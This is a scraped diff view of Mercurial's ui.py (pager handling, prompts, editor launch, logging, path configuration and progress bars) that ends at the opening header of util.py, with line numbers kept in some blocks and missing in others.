        # gracefully and tell the user about their broken pager.
        shell = any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")

        if pycompat.iswindows and not shell:
            # Window's built-in `more` cannot be invoked with shell=False, but
            # its `more.com` can. Hide this implementation detail from the
            # user so we can also get sane bad PAGER behavior. MSYS has
            # `more.exe`, so do a cmd.exe style resolution of the executable to
            # determine which one to use.
            fullcmd = procutil.findexe(command)
            if not fullcmd:
                self.warn(
                    _(b"missing pager command '%s', skipping pager\n") % command
                )
                return False

            command = fullcmd

        try:
            pager = subprocess.Popen(
                procutil.tonativestr(command),
                shell=shell,
                bufsize=-1,
                close_fds=procutil.closefds,
                stdin=subprocess.PIPE,
                stdout=procutil.stdout,
                stderr=procutil.stderr,
                env=procutil.tonativeenv(procutil.shellenviron(env)),
            )
        except OSError as e:
            # without a shell, a missing binary surfaces as ENOENT here;
            # treat it the same as the Windows lookup failure above
            if e.errno == errno.ENOENT and not shell:
                self.warn(
                    _(b"missing pager command '%s', skipping pager\n") % command
                )
                return False
            raise

        # back up original file descriptors
        stdoutfd = os.dup(procutil.stdout.fileno())
        stderrfd = os.dup(procutil.stderr.fileno())

        os.dup2(pager.stdin.fileno(), procutil.stdout.fileno())
        if self._isatty(procutil.stderr):
            os.dup2(pager.stdin.fileno(), procutil.stderr.fileno())

        @self.atexit
        def killpager():
            if util.safehasattr(signal, b"SIGINT"):
                signal.signal(signal.SIGINT, signal.SIG_IGN)
            # restore original fds, closing pager.stdin copies in the process
            os.dup2(stdoutfd, procutil.stdout.fileno())
            os.dup2(stderrfd, procutil.stderr.fileno())
            pager.stdin.close()
            pager.wait()

        return True
1444 1444
1445 1445 @property
1446 1446 def _exithandlers(self):
1447 1447 return _reqexithandlers
1448 1448
1449 1449 def atexit(self, func, *args, **kwargs):
1450 1450 '''register a function to run after dispatching a request
1451 1451
1452 1452 Handlers do not stay registered across request boundaries.'''
1453 1453 self._exithandlers.append((func, args, kwargs))
1454 1454 return func
1455 1455
    def interface(self, feature):
        """what interface to use for interactive console features?

        The interface is controlled by the value of `ui.interface` but also by
        the value of feature-specific configuration. For example:

        ui.interface.histedit = text
        ui.interface.chunkselector = curses

        Here the features are "histedit" and "chunkselector".

        The configuration above means that the default interface for commands
        is curses, the interface for histedit is text and the interface for
        selecting chunk is crecord (the best curses interface available).

        Consider the following example:
        ui.interface = curses
        ui.interface.histedit = text

        Then histedit will use the text interface and chunkselector will use
        the default curses interface (crecord at the moment).
        """
        alldefaults = frozenset([b"text", b"curses"])

        # interfaces each feature is allowed to use
        featureinterfaces = {
            b"chunkselector": [b"text", b"curses",],
            b"histedit": [b"text", b"curses",],
        }

        # Feature-specific interface
        if feature not in featureinterfaces.keys():
            # Programming error, not user error
            raise ValueError(b"Unknown feature requested %s" % feature)

        availableinterfaces = frozenset(featureinterfaces[feature])
        if alldefaults > availableinterfaces:
            # Programming error, not user error. We need a use case to
            # define the right thing to do here.
            raise ValueError(
                b"Feature %s does not handle all default interfaces" % feature
            )

        # plain mode / dumb terminals always fall back to plain text
        if self.plain() or encoding.environ.get(b'TERM') == b'dumb':
            return b"text"

        # Default interface for all the features
        defaultinterface = b"text"
        i = self.config(b"ui", b"interface")
        if i in alldefaults:
            defaultinterface = i

        choseninterface = defaultinterface
        f = self.config(b"ui", b"interface.%s" % feature)
        if f in availableinterfaces:
            choseninterface = f

        # warn about invalid config values, while still returning the
        # best valid choice computed above
        if i is not None and defaultinterface != i:
            if f is not None:
                self.warn(_(b"invalid value for ui.interface: %s\n") % (i,))
            else:
                self.warn(
                    _(b"invalid value for ui.interface: %s (using %s)\n")
                    % (i, choseninterface)
                )
        if f is not None and choseninterface != f:
            self.warn(
                _(b"invalid value for ui.interface.%s: %s (using %s)\n")
                % (feature, f, choseninterface)
            )

        return choseninterface
1527 1527
1528 1528 def interactive(self):
1529 1529 '''is interactive input allowed?
1530 1530
1531 1531 An interactive session is a session where input can be reasonably read
1532 1532 from `sys.stdin'. If this function returns false, any attempt to read
1533 1533 from stdin should fail with an error, unless a sensible default has been
1534 1534 specified.
1535 1535
1536 1536 Interactiveness is triggered by the value of the `ui.interactive'
1537 1537 configuration variable or - if it is unset - when `sys.stdin' points
1538 1538 to a terminal device.
1539 1539
1540 1540 This function refers to input only; for output, see `ui.formatted()'.
1541 1541 '''
1542 1542 i = self.configbool(b"ui", b"interactive")
1543 1543 if i is None:
1544 1544 # some environments replace stdin without implementing isatty
1545 1545 # usually those are non-interactive
1546 1546 return self._isatty(self._fin)
1547 1547
1548 1548 return i
1549 1549
1550 1550 def termwidth(self):
1551 1551 '''how wide is the terminal in columns?
1552 1552 '''
1553 1553 if b'COLUMNS' in encoding.environ:
1554 1554 try:
1555 1555 return int(encoding.environ[b'COLUMNS'])
1556 1556 except ValueError:
1557 1557 pass
1558 1558 return scmutil.termsize(self)[0]
1559 1559
1560 1560 def formatted(self):
1561 1561 '''should formatted output be used?
1562 1562
1563 1563 It is often desirable to format the output to suite the output medium.
1564 1564 Examples of this are truncating long lines or colorizing messages.
1565 1565 However, this is not often not desirable when piping output into other
1566 1566 utilities, e.g. `grep'.
1567 1567
1568 1568 Formatted output is triggered by the value of the `ui.formatted'
1569 1569 configuration variable or - if it is unset - when `sys.stdout' points
1570 1570 to a terminal device. Please note that `ui.formatted' should be
1571 1571 considered an implementation detail; it is not intended for use outside
1572 1572 Mercurial or its extensions.
1573 1573
1574 1574 This function refers to output only; for input, see `ui.interactive()'.
1575 1575 This function always returns false when in plain mode, see `ui.plain()'.
1576 1576 '''
1577 1577 if self.plain():
1578 1578 return False
1579 1579
1580 1580 i = self.configbool(b"ui", b"formatted")
1581 1581 if i is None:
1582 1582 # some environments replace stdout without implementing isatty
1583 1583 # usually those are non-interactive
1584 1584 return self._isatty(self._fout)
1585 1585
1586 1586 return i
1587 1587
    def _readline(self, prompt=b' ', promptopts=None):
        """Read one line of user input, optionally with readline support.

        Returns the entered line with the trailing OS line separator
        stripped; raises EOFError on end of input.
        """
        # Replacing stdin/stdout temporarily is a hard problem on Python 3
        # because they have to be text streams with *no buffering*. Instead,
        # we use rawinput() only if call_readline() will be invoked by
        # PyOS_Readline(), so no I/O will be made at Python layer.
        usereadline = (
            self._isatty(self._fin)
            and self._isatty(self._fout)
            and procutil.isstdin(self._fin)
            and procutil.isstdout(self._fout)
        )
        if usereadline:
            try:
                # magically add command line editing support, where
                # available
                import readline

                # force demandimport to really load the module
                readline.read_history_file
                # windows sometimes raises something other than ImportError
            except Exception:
                usereadline = False

        if self._colormode == b'win32' or not usereadline:
            if not promptopts:
                promptopts = {}
            # emit the prompt through the message channel; the actual
            # rawinput/readline prompt is reduced to a single space
            self._writemsgnobuf(
                self._fmsgout, prompt, type=b'prompt', **promptopts
            )
            self.flush()
            prompt = b' '
        else:
            prompt = self.label(prompt, b'ui.prompt') + b' '

        # prompt ' ' must exist; otherwise readline may delete entire line
        # - http://bugs.python.org/issue12833
        with self.timeblockedsection(b'stdio'):
            if usereadline:
                self.flush()
                prompt = encoding.strfromlocal(prompt)
                line = encoding.strtolocal(pycompat.rawinput(prompt))
                # When stdin is in binary mode on Windows, it can cause
                # raw_input() to emit an extra trailing carriage return
                if pycompat.oslinesep == b'\r\n' and line.endswith(b'\r'):
                    line = line[:-1]
            else:
                self._fout.write(pycompat.bytestr(prompt))
                self._fout.flush()
                line = self._fin.readline()
                if not line:
                    raise EOFError
                line = line.rstrip(pycompat.oslinesep)

        return line
1642 1642
1643 1643 def prompt(self, msg, default=b"y"):
1644 1644 """Prompt user with msg, read response.
1645 1645 If ui is not interactive, the default is returned.
1646 1646 """
1647 1647 return self._prompt(msg, default=default)
1648 1648
    def _prompt(self, msg, **opts):
        """Prompt and read a response; ``opts`` must include 'default'.

        Remaining keyword options are forwarded to the message writer and
        to _readline().
        """
        default = opts['default']
        if not self.interactive():
            # non-interactive: echo the prompt and the default answer so the
            # output still records what was "chosen"
            self._writemsg(self._fmsgout, msg, b' ', type=b'prompt', **opts)
            self._writemsg(
                self._fmsgout, default or b'', b"\n", type=b'promptecho'
            )
            return default
        try:
            r = self._readline(prompt=msg, promptopts=opts)
            if not r:
                # empty response means the default
                r = default
            if self.configbool(b'ui', b'promptecho'):
                self._writemsg(self._fmsgout, r, b"\n", type=b'promptecho')
            return r
        except EOFError:
            raise error.ResponseExpected()
1666 1666
1667 1667 @staticmethod
1668 1668 def extractchoices(prompt):
1669 1669 """Extract prompt message and list of choices from specified prompt.
1670 1670
1671 1671 This returns tuple "(message, choices)", and "choices" is the
1672 1672 list of tuple "(response character, text without &)".
1673 1673
1674 1674 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1675 1675 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1676 1676 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1677 1677 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1678 1678 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1679 1679 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1680 1680 """
1681 1681
1682 1682 # Sadly, the prompt string may have been built with a filename
1683 1683 # containing "$$" so let's try to find the first valid-looking
1684 1684 # prompt to start parsing. Sadly, we also can't rely on
1685 1685 # choices containing spaces, ASCII, or basically anything
1686 1686 # except an ampersand followed by a character.
1687 1687 m = re.match(br'(?s)(.+?)\$\$([^$]*&[^ $].*)', prompt)
1688 1688 msg = m.group(1)
1689 1689 choices = [p.strip(b' ') for p in m.group(2).split(b'$$')]
1690 1690
1691 1691 def choicetuple(s):
1692 1692 ampidx = s.index(b'&')
1693 1693 return s[ampidx + 1 : ampidx + 2].lower(), s.replace(b'&', b'', 1)
1694 1694
1695 1695 return (msg, [choicetuple(s) for s in choices])
1696 1696
1697 1697 def promptchoice(self, prompt, default=0):
1698 1698 """Prompt user with a message, read response, and ensure it matches
1699 1699 one of the provided choices. The prompt is formatted as follows:
1700 1700
1701 1701 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1702 1702
1703 1703 The index of the choice is returned. Responses are case
1704 1704 insensitive. If ui is not interactive, the default is
1705 1705 returned.
1706 1706 """
1707 1707
1708 1708 msg, choices = self.extractchoices(prompt)
1709 1709 resps = [r for r, t in choices]
1710 1710 while True:
1711 1711 r = self._prompt(msg, default=resps[default], choices=choices)
1712 1712 if r.lower() in resps:
1713 1713 return resps.index(r.lower())
1714 1714 # TODO: shouldn't it be a warning?
1715 1715 self._writemsg(self._fmsgout, _(b"unrecognized response\n"))
1716 1716
1717 1717 def getpass(self, prompt=None, default=None):
1718 1718 if not self.interactive():
1719 1719 return default
1720 1720 try:
1721 1721 self._writemsg(
1722 1722 self._fmsgerr,
1723 1723 prompt or _(b'password: '),
1724 1724 type=b'prompt',
1725 1725 password=True,
1726 1726 )
1727 1727 # disable getpass() only if explicitly specified. it's still valid
1728 1728 # to interact with tty even if fin is not a tty.
1729 1729 with self.timeblockedsection(b'stdio'):
1730 1730 if self.configbool(b'ui', b'nontty'):
1731 1731 l = self._fin.readline()
1732 1732 if not l:
1733 1733 raise EOFError
1734 1734 return l.rstrip(b'\n')
1735 1735 else:
1736 1736 return getpass.getpass('')
1737 1737 except EOFError:
1738 1738 raise error.ResponseExpected()
1739 1739
1740 1740 def status(self, *msg, **opts):
1741 1741 '''write status message to output (if ui.quiet is False)
1742 1742
1743 1743 This adds an output label of "ui.status".
1744 1744 '''
1745 1745 if not self.quiet:
1746 1746 self._writemsg(self._fmsgout, type=b'status', *msg, **opts)
1747 1747
1748 1748 def warn(self, *msg, **opts):
1749 1749 '''write warning message to output (stderr)
1750 1750
1751 1751 This adds an output label of "ui.warning".
1752 1752 '''
1753 1753 self._writemsg(self._fmsgerr, type=b'warning', *msg, **opts)
1754 1754
1755 1755 def error(self, *msg, **opts):
1756 1756 '''write error message to output (stderr)
1757 1757
1758 1758 This adds an output label of "ui.error".
1759 1759 '''
1760 1760 self._writemsg(self._fmsgerr, type=b'error', *msg, **opts)
1761 1761
1762 1762 def note(self, *msg, **opts):
1763 1763 '''write note to output (if ui.verbose is True)
1764 1764
1765 1765 This adds an output label of "ui.note".
1766 1766 '''
1767 1767 if self.verbose:
1768 1768 self._writemsg(self._fmsgout, type=b'note', *msg, **opts)
1769 1769
1770 1770 def debug(self, *msg, **opts):
1771 1771 '''write debug message to output (if ui.debugflag is True)
1772 1772
1773 1773 This adds an output label of "ui.debug".
1774 1774 '''
1775 1775 if self.debugflag:
1776 1776 self._writemsg(self._fmsgout, type=b'debug', *msg, **opts)
1777 1777 self.log(b'debug', b'%s', b''.join(msg))
1778 1778
    # Aliases to defeat check-code.  Presumably the *noi18n names let
    # callers pass deliberately-untranslated strings without tripping the
    # checker on the canonical names — verify against check-code rules.
    statusnoi18n = status
    notenoi18n = note
    warnnoi18n = warn
    writenoi18n = write
1784 1784
    def edit(
        self,
        text,
        user,
        extra=None,
        editform=None,
        pending=None,
        repopath=None,
        action=None,
    ):
        """Launch the user's editor on *text* and return the edited result.

        The text is written to a temporary file, the configured editor is
        run on it, and the file contents are read back (EOL-normalized)
        and returned. The temporary file is always removed.
        """
        if action is None:
            self.develwarn(
                b'action is None but will soon be a required '
                b'parameter to ui.edit()'
            )
        extra_defaults = {
            b'prefix': b'editor',
            b'suffix': b'.txt',
        }
        if extra is not None:
            if extra.get(b'suffix') is not None:
                self.develwarn(
                    b'extra.suffix is not None but will soon be '
                    b'ignored by ui.edit()'
                )
            extra_defaults.update(extra)
        extra = extra_defaults

        # pick the temp-file suffix; an explicit action wins over
        # extra['suffix']
        if action == b'diff':
            suffix = b'.diff'
        elif action:
            suffix = b'.%s.hg.txt' % action
        else:
            suffix = extra[b'suffix']

        rdir = None
        if self.configbool(b'experimental', b'editortmpinhg'):
            rdir = repopath
        (fd, name) = pycompat.mkstemp(
            prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
        )
        try:
            with os.fdopen(fd, 'wb') as f:
                f.write(util.tonativeeol(text))

            # expose revision/source metadata to the editor via environment
            environ = {b'HGUSER': user}
            if b'transplant_source' in extra:
                environ.update(
                    {b'HGREVISION': hex(extra[b'transplant_source'])}
                )
            for label in (b'intermediate-source', b'source', b'rebase_source'):
                if label in extra:
                    environ.update({b'HGREVISION': extra[label]})
                    break
            if editform:
                environ.update({b'HGEDITFORM': editform})
            if pending:
                environ.update({b'HG_PENDING': pending})

            editor = self.geteditor()

            self.system(
                b"%s \"%s\"" % (editor, name),
                environ=environ,
                onerr=error.Abort,
                errprefix=_(b"edit failed"),
                blockedtag=b'editor',
            )

            with open(name, 'rb') as f:
                t = util.fromnativeeol(f.read())
        finally:
            # always clean up the temp file, even when the editor failed
            os.unlink(name)

        return t
1860 1860
    def system(
        self,
        cmd,
        environ=None,
        cwd=None,
        onerr=None,
        errprefix=None,
        blockedtag=None,
    ):
        '''execute shell command with appropriate output stream. command
        output will be redirected if fout is not stdout.

        if command fails and onerr is None, return status, else raise onerr
        object as exception.
        '''
        if blockedtag is None:
            # Long cmds tend to be because of an absolute path on cmd. Keep
            # the tail end instead
            cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
            blockedtag = b'unknown_system_' + cmdsuffix
        out = self._fout
        # when output is being buffered, route the subprocess output
        # through this ui object instead of the real stream
        if any(s[1] for s in self._bufferstates):
            out = self
        with self.timeblockedsection(blockedtag):
            rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
        if rc and onerr:
            errmsg = b'%s %s' % (
                procutil.shellsplit(cmd)[0],
                procutil.explainexit(rc),
            )
            if errprefix:
                errmsg = b'%s: %s' % (errprefix, errmsg)
            raise onerr(errmsg)
        return rc
1895 1895
1896 1896 def _runsystem(self, cmd, environ, cwd, out):
1897 1897 """actually execute the given shell command (can be overridden by
1898 1898 extensions like chg)"""
1899 1899 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1900 1900
    def traceback(self, exc=None, force=False):
        '''print exception traceback if traceback printing enabled or forced.
        only to call in exception handler. returns true if traceback
        printed.'''
        if self.tracebackflag or force:
            if exc is None:
                exc = sys.exc_info()
            # a chained original exception may be attached as 'cause'
            cause = getattr(exc[1], 'cause', None)

            if cause is not None:
                causetb = traceback.format_tb(cause[2])
                exctb = traceback.format_tb(exc[2])
                exconly = traceback.format_exception_only(cause[0], cause[1])

                # exclude frame where 'exc' was chained and rethrown from exctb
                self.write_err(
                    b'Traceback (most recent call last):\n',
                    encoding.strtolocal(''.join(exctb[:-1])),
                    encoding.strtolocal(''.join(causetb)),
                    encoding.strtolocal(''.join(exconly)),
                )
            else:
                output = traceback.format_exception(exc[0], exc[1], exc[2])
                self.write_err(encoding.strtolocal(''.join(output)))
        return self.tracebackflag or force
1926 1926
1927 1927 def geteditor(self):
1928 1928 '''return editor to use'''
1929 1929 if pycompat.sysplatform == b'plan9':
1930 1930 # vi is the MIPS instruction simulator on Plan 9. We
1931 1931 # instead default to E to plumb commit messages to
1932 1932 # avoid confusion.
1933 1933 editor = b'E'
1934 1934 elif pycompat.isdarwin:
1935 1935 # vi on darwin is POSIX compatible to a fault, and that includes
1936 1936 # exiting non-zero if you make any mistake when running an ex
1937 1937 # command. Proof: `vi -c ':unknown' -c ':qa'; echo $?` produces 1,
1938 1938 # while s/vi/vim/ doesn't.
1939 1939 editor = b'vim'
1940 1940 else:
1941 1941 editor = b'vi'
1942 1942 return encoding.environ.get(b"HGEDITOR") or self.config(
1943 1943 b"ui", b"editor", editor
1944 1944 )
1945 1945
1946 1946 @util.propertycache
1947 1947 def _progbar(self):
1948 1948 """setup the progbar singleton to the ui object"""
1949 1949 if (
1950 1950 self.quiet
1951 1951 or self.debugflag
1952 1952 or self.configbool(b'progress', b'disable')
1953 1953 or not progress.shouldprint(self)
1954 1954 ):
1955 1955 return None
1956 1956 return getprogbar(self)
1957 1957
1958 1958 def _progclear(self):
1959 1959 """clear progress bar output if any. use it before any output"""
1960 1960 if not haveprogbar(): # nothing loaded yet
1961 1961 return
1962 1962 if self._progbar is not None and self._progbar.printed:
1963 1963 self._progbar.clear()
1964 1964
    def makeprogress(self, topic, unit=b"", total=None):
        """Create a progress helper for the specified topic"""
        if getattr(self._fmsgerr, 'structured', False):
            # channel for machine-readable output with metadata, just send
            # raw information
            # TODO: consider porting some useful information (e.g. estimated
            # time) from progbar. we might want to support update delay to
            # reduce the cost of transferring progress messages.
            def updatebar(topic, pos, item, unit, total):
                self._fmsgerr.write(
                    None,
                    type=b'progress',
                    topic=topic,
                    pos=pos,
                    item=item,
                    unit=unit,
                    total=total,
                )

        elif self._progbar is not None:
            # classic terminal progress bar
            updatebar = self._progbar.progress
        else:
            # progress output disabled: use a no-op callback
            def updatebar(topic, pos, item, unit, total):
                pass

        return scmutil.progress(self, updatebar, topic, unit, total)
1992 1992
1993 1993 def getlogger(self, name):
1994 1994 """Returns a logger of the given name; or None if not registered"""
1995 1995 return self._loggers.get(name)
1996 1996
1997 1997 def setlogger(self, name, logger):
1998 1998 """Install logger which can be identified later by the given name
1999 1999
2000 2000 More than one loggers can be registered. Use extension or module
2001 2001 name to uniquely identify the logger instance.
2002 2002 """
2003 2003 self._loggers[name] = logger
2004 2004
    def log(self, event, msgfmt, *msgargs, **opts):
        '''hook for logging facility extensions

        event should be a readily-identifiable subsystem, which will
        allow filtering.

        msgfmt should be a newline-terminated format string to log, and
        *msgargs are %-formatted into it.

        **opts currently has no defined meanings.
        '''
        if not self._loggers:
            return
        activeloggers = [
            l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
        ]
        if not activeloggers:
            return
        msg = msgfmt % msgargs
        opts = pycompat.byteskwargs(opts)
        # guard against recursion from e.g. ui.debug(): temporarily clear
        # the registry while the handlers run, then restore it
        registeredloggers = self._loggers
        self._loggers = {}
        try:
            for logger in activeloggers:
                logger.log(self, event, msg, opts)
        finally:
            self._loggers = registeredloggers
2033 2033
2034 2034 def label(self, msg, label):
2035 2035 '''style msg based on supplied label
2036 2036
2037 2037 If some color mode is enabled, this will add the necessary control
2038 2038 characters to apply such color. In addition, 'debug' color mode adds
2039 2039 markup showing which label affects a piece of text.
2040 2040
2041 2041 ui.write(s, 'label') is equivalent to
2042 2042 ui.write(ui.label(s, 'label')).
2043 2043 '''
2044 2044 if self._colormode is not None:
2045 2045 return color.colorlabel(self, msg, label)
2046 2046 return msg
2047 2047
    def develwarn(self, msg, stacklevel=1, config=None):
        """issue a developer warning message

        Use 'stacklevel' to report the offender some layers further up in the
        stack.
        """
        # warnings are suppressed unless devel.all-warnings or the
        # feature-specific devel.<config> knob is enabled
        if not self.configbool(b'devel', b'all-warnings'):
            if config is None or not self.configbool(b'devel', config):
                return
        msg = b'devel-warn: ' + msg
        stacklevel += 1  # get in develwarn
        if self.tracebackflag:
            util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
            self.log(
                b'develwarn',
                b'%s at:\n%s'
                % (msg, b''.join(util.getstackframes(stacklevel))),
            )
        else:
            # report only the single offending frame at 'stacklevel'
            curframe = inspect.currentframe()
            calframe = inspect.getouterframes(curframe, 2)
            fname, lineno, fmsg = calframe[stacklevel][1:4]
            fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
            self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
            self.log(
                b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
            )

            # avoid cycles (frame objects reference their locals)
            del curframe
            del calframe
2079 2079
2080 2080 def deprecwarn(self, msg, version, stacklevel=2):
2081 2081 """issue a deprecation warning
2082 2082
2083 2083 - msg: message explaining what is deprecated and how to upgrade,
2084 2084 - version: last version where the API will be supported,
2085 2085 """
2086 2086 if not (
2087 2087 self.configbool(b'devel', b'all-warnings')
2088 2088 or self.configbool(b'devel', b'deprec-warn')
2089 2089 ):
2090 2090 return
2091 2091 msg += (
2092 2092 b"\n(compatibility will be dropped after Mercurial-%s,"
2093 2093 b" update your code.)"
2094 2094 ) % version
2095 2095 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
2096 2096
2097 2097 def exportableenviron(self):
2098 2098 """The environment variables that are safe to export, e.g. through
2099 2099 hgweb.
2100 2100 """
2101 2101 return self._exportableenviron
2102 2102
    @contextlib.contextmanager
    def configoverride(self, overrides, source=b""):
        """Context manager for temporary config overrides
        `overrides` must be a dict of the following structure:
        {(section, name) : value}"""
        backups = {}
        try:
            for (section, name), value in overrides.items():
                # back up before each setconfig so the finally block can
                # restore even if a later setconfig fails
                backups[(section, name)] = self.backupconfig(section, name)
                self.setconfig(section, name, value, source)
            yield
        finally:
            for __, backup in backups.items():
                self.restoreconfig(backup)
            # just restoring ui.quiet config to the previous value is not enough
            # as it does not update ui.quiet class member
            if (b'ui', b'quiet') in overrides:
                self.fixconfig(section=b'ui')
2121 2121
2122 def estimatememory(self):
2123 """Provide an estimate for the available system memory in Bytes.
2124
2125 This can be overriden via ui.available-memory. It returns None, if
2126 no estimate can be computed.
2127 """
2128 value = self.config(b'ui', b'available-memory')
2129 if value is not None:
2130 try:
2131 return util.sizetoint(value)
2132 except error.ParseError:
2133 raise error.ConfigError(
2134 _(b"ui.available-memory value is invalid ('%s')") % value
2135 )
2136 return util._estimatememory()
2137
2122 2138
class paths(dict):
    """Represents a collection of paths and their configs.

    Data is initially derived from ui instances and the config files they have
    loaded.
    """

    def __init__(self, ui):
        dict.__init__(self)

        for name, loc in ui.configitems(b'paths', ignoresub=True):
            # No location is the same as not existing.
            if not loc:
                continue
            # re-read the location together with any declared sub-options
            # (e.g. pushurl) for this path
            loc, sub = ui.configsuboptions(b'paths', name)
            self[name] = path(ui, name, rawloc=loc, suboptions=sub)

    def getpath(self, name, default=None):
        """Return a ``path`` from a string, falling back to default.

        ``name`` can be a named path or locations. Locations are filesystem
        paths or URIs.

        Returns None if ``name`` is not a registered path, a URI, or a local
        path to a repo.
        """
        # Only fall back to default if no path was requested.
        if name is None:
            if not default:
                default = ()
            elif not isinstance(default, (tuple, list)):
                default = (default,)
            # return the first default that resolves to a known path
            for k in default:
                try:
                    return self[k]
                except KeyError:
                    continue
            return None

        # Most likely empty string.
        # This may need to raise in the future.
        if not name:
            return None

        try:
            return self[name]
        except KeyError:
            # Try to resolve as a local path or URI.
            try:
                # We don't pass sub-options in, so no need to pass ui instance.
                return path(None, None, rawloc=name)
            except ValueError:
                raise error.RepoError(_(b'repository %s does not exist') % name)
2176 2192
2177 2193
2178 2194 _pathsuboptions = {}
2179 2195
2180 2196
2181 2197 def pathsuboption(option, attr):
2182 2198 """Decorator used to declare a path sub-option.
2183 2199
2184 2200 Arguments are the sub-option name and the attribute it should set on
2185 2201 ``path`` instances.
2186 2202
2187 2203 The decorated function will receive as arguments a ``ui`` instance,
2188 2204 ``path`` instance, and the string value of this option from the config.
2189 2205 The function should return the value that will be set on the ``path``
2190 2206 instance.
2191 2207
2192 2208 This decorator can be used to perform additional verification of
2193 2209 sub-options and to change the type of sub-options.
2194 2210 """
2195 2211
2196 2212 def register(func):
2197 2213 _pathsuboptions[option] = (attr, func)
2198 2214 return func
2199 2215
2200 2216 return register
2201 2217
2202 2218
@pathsuboption(b'pushurl', b'pushloc')
def pushurlpathoption(ui, path, value):
    """Validate a ``pushurl`` sub-option: must be a URL without #fragment."""
    u = util.url(value)
    if not u.scheme:
        # pushurl must actually be a URL, not a bare path.
        ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
        return None

    if u.fragment:
        # The "#branch" syntax is not supported in a push URL.
        ui.warn(
            _(
                b'("#fragment" in paths.%s:pushurl not supported; '
                b'ignoring)\n'
            )
            % path.name
        )
        u.fragment = None

    return bytes(u)
2224 2240
2225 2241
@pathsuboption(b'pushrev', b'pushrev')
def pushrevpathoption(ui, path, value):
    """Store the ``pushrev`` sub-option verbatim (a revset string)."""
    return value
2229 2245
2230 2246
class path(object):
    """Represents an individual path and its configuration."""

    def __init__(self, ui, name, rawloc=None, suboptions=None):
        """Construct a path from its config options.

        ``ui`` is the ``ui`` instance the path is coming from.
        ``name`` is the symbolic name of the path.
        ``rawloc`` is the raw location, as defined in the config.
        ``pushloc`` is the raw locations pushes should be made to.

        If ``name`` is not defined, we require that the location be a) a
        local filesystem path with a .hg directory or b) a URL.  If not,
        ``ValueError`` is raised.
        """
        if not rawloc:
            raise ValueError(b'rawloc must be defined')

        # A location may carry a branch via the <base>#<branch> syntax.
        parsed = util.url(rawloc)
        if parsed.fragment:
            branch = parsed.fragment
            parsed.fragment = None
        else:
            branch = None

        self.url = parsed
        self.branch = branch
        self.name = name
        self.rawloc = rawloc
        self.loc = b'%s' % parsed

        # A raw location given without a symbolic name must itself be
        # a valid URL or local repository path.
        if not name and not parsed.scheme:
            if not self._isvalidlocalpath(self.loc):
                raise ValueError(
                    b'location is not a URL or path to a local '
                    b'repo: %s' % rawloc
                )

        suboptions = suboptions or {}

        # Apply registered sub-options.  Every registered attribute is set,
        # defaulting to None when the sub-option was absent or invalid.
        for subopt, (attr, func) in pycompat.iteritems(_pathsuboptions):
            if subopt in suboptions:
                setattr(self, attr, func(ui, self, suboptions[subopt]))
            else:
                setattr(self, attr, None)

    def _isvalidlocalpath(self, path):
        """Returns True if the given path is a potentially valid repository.
        This is its own function so that extensions can change the definition
        of 'valid' in this case (like when pulling from a git repo into a hg
        one)."""
        try:
            return os.path.isdir(os.path.join(path, b'.hg'))
        # Python 2 may return TypeError. Python 3, ValueError.
        except (TypeError, ValueError):
            return False

    @property
    def suboptions(self):
        """Return sub-options and their values for this path.

        This is intended to be used for presentation purposes.
        """
        return {
            subopt: getattr(self, attr)
            for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions)
            if getattr(self, attr) is not None
        }
2307 2323
2308 2324
# One globally shared progress bar: multiple ui objects would otherwise
# fight over the terminal with competing progress bars.
_progresssingleton = None


def getprogbar(ui):
    """Return the process-wide progress bar, creating it on first use."""
    global _progresssingleton
    if _progresssingleton is None:
        # Handing a 'ui' object to the singleton is fishy; this mirrors how
        # the old progress extension worked and could be reworked.
        _progresssingleton = progress.progbar(ui)
    return _progresssingleton


def haveprogbar():
    """Report whether the shared progress bar has been instantiated."""
    return _progresssingleton is not None
2325 2341
2326 2342
2327 2343 def _selectmsgdests(ui):
2328 2344 name = ui.config(b'ui', b'message-output')
2329 2345 if name == b'channel':
2330 2346 if ui.fmsg:
2331 2347 return ui.fmsg, ui.fmsg
2332 2348 else:
2333 2349 # fall back to ferr if channel isn't ready so that status/error
2334 2350 # messages can be printed
2335 2351 return ui.ferr, ui.ferr
2336 2352 if name == b'stdio':
2337 2353 return ui.fout, ui.ferr
2338 2354 if name == b'stderr':
2339 2355 return ui.ferr, ui.ferr
2340 2356 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
2341 2357
2342 2358
2343 2359 def _writemsgwith(write, dest, *args, **opts):
2344 2360 """Write ui message with the given ui._write*() function
2345 2361
2346 2362 The specified message type is translated to 'ui.<type>' label if the dest
2347 2363 isn't a structured channel, so that the message will be colorized.
2348 2364 """
2349 2365 # TODO: maybe change 'type' to a mandatory option
2350 2366 if 'type' in opts and not getattr(dest, 'structured', False):
2351 2367 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2352 2368 write(dest, *args, **opts)
@@ -1,3628 +1,3669 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
